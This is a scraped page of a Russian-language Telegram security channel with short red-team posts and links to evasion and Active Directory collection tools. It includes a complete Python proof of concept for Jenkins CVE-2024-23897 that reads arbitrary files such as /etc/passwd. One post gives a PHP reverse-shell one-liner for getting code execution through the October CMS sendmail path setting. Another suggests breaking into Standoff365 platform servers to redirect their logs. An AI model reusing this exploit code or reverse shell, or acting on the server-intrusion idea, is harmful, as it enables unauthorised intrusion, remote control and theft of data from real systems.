true_security – Telegram
true_security
2.24K subscribers
42 photos
4 videos
15 files
55 links
автор и владелец Zer0Way -@Nu11ed09
Download Telegram
поискал в интернетах чужие проверки posture hostscan, самые упоротые в amazon. Что люди только не проверяют ) как можно заметить, меньше всего проверок на linux и macos
👍3
Бывает такое, только что то придумаешь, только соберешься написать, а это за 3 дня до тебя уже кто то написал.
Интерактивная оболочка с подделкой аргументов командной строки (PEB Spoofing) - https://github.com/itaymigdal/LOLSpoof
Классная штука для байпаса множества детектов socами и иногда edr и av.
Forwarded from Ralf Hacker Channel (Ralf Hacker)
От имени любого пользователя можно аварийно завершить службу журнала событий Windows.

https://github.com/floesen/EventLogCrasher

#redteam #bypass #maldev
Был сбор событий.....нет сбора событий...
😁6👍2🔥2
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897

Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.

PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys

if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()

data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())

print(f'REQ: {data_bytes}\n')

def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')

def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)

t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)

t1.start()
time.sleep(0.1)
t2.start()

t1.join()
t2.join()


Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👎21
Где найти команду сбер страхования? нужно показать интересные вещи...
Аналог sharphound и других сборщиков для bloodhound (и не только), но собирает информацию по протоколу Active Directory Web Services (ADWS) через SOAP запросы.
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound

P.S. на контроллерах домена должен быть открыт tcp порт 9389
🔥3
Нолик от нолика (я cve не нашел и метод работает на стенде разработчика с последней версией - 3.5.0).
Уволился с работы, появилась неделя свободного времени.
Пошел ковырять стендофф365, смотрел сегодня таску с october cms. Попал в админку, посмотрел как ребята мучались с rce и нашел свой способ rce через админ панель.
В настройках отправки почты необходимо выбрать метод sendmail и в строку sendmail path дописать свой код для выполнения, например reverse shell:
php -r '$sock=fsockopen("ip",port);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'; /usr/sbin/sendmail -t -i
после сохранения настроек необходимо вызвать отправку письма, например восстановлением пароля по логину и команда будет выполнена. Привет reverse shell.
Разумеется, только в образовательных целях.
🔥16👍3
Интересное время, стали появляться крякнутые продукты позитива. pt nad, pt siem + vm. Это ли не признание продуктов?:)
👍11😁7
Не секрет что друзья не растут в огороде позитив собирает телеметрию на площадке standoff365. Если для "красных" ситуация более менее понятна, можно когда угодно приходить и тренить, за что собственно огромный респект pt. То с синими все печально, нет ни-че-го для развития скилов.
Что же делать простому работяге?)) Можно, например, прокачаться в социалку и инфру, получить доступ к серверам стендов... а потом завернуть логи к себе для дальнейшего сбора телеметрии.
PT собирает логи на лог коллекторы, что собственно не мешает нам забирать эти логи после получения доступа. Так же очень интересны, с точки зрения хантов, doc файлы которые отправляют при реализации атак методом соц. инженерии, логи веб-серверов и auditd с linuxов.
Вот так площадка standoff365 может быть полезна синим, и мозги размять при взломе и телеметрию собрать.

P.S. наврятли вы/мы/я найдем что то супер интересное в логах со standoff365, но для выработки насмотренности очень даже ничего.
👍5
true_security
первый релиз описанного выше модуля (целиком со всем проектом impacket): https://github.com/feedb/impacket_ews Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение. запуск: ntlmrelayx.py -smb2support -t htt…
Накопительное обновление 14 (CU14) Exchange Server 2019 устраняет эту уязвимость, активируя защиту ретрансляции учетных данных NTLM (также известную как расширенная защита для проверки подлинности или EPA).

Прощайте релеи на exchange =/.
Еще и уязвимостью это обозвали. жили столько лет а тут не тебе.
это еще и зиродей CVE-2024-21410 (CVSS: 9,8). 😂 что курят в майкрософт, этой теме 100 лет уже и разных тулз для эксплуатации было выпущено достаточно. Некоторые из этих тулз уже протухли и умерли.

по этим чертовым netntlmv2 можно брутить пароли пользователей, нужно срочно запретить пароли.
жду через 5 лет фиксов в утечках ntlm хэшей через html файлы, будет 000day🤨


ПС майки, там еще с сервером sharepoint беда)))
👍4
Что интересного можно найти на standoff365? Например, лог mikikatz с паролями хэшами какой то компании....который притащил с собой пентестер😜
😁22🔥2🥰1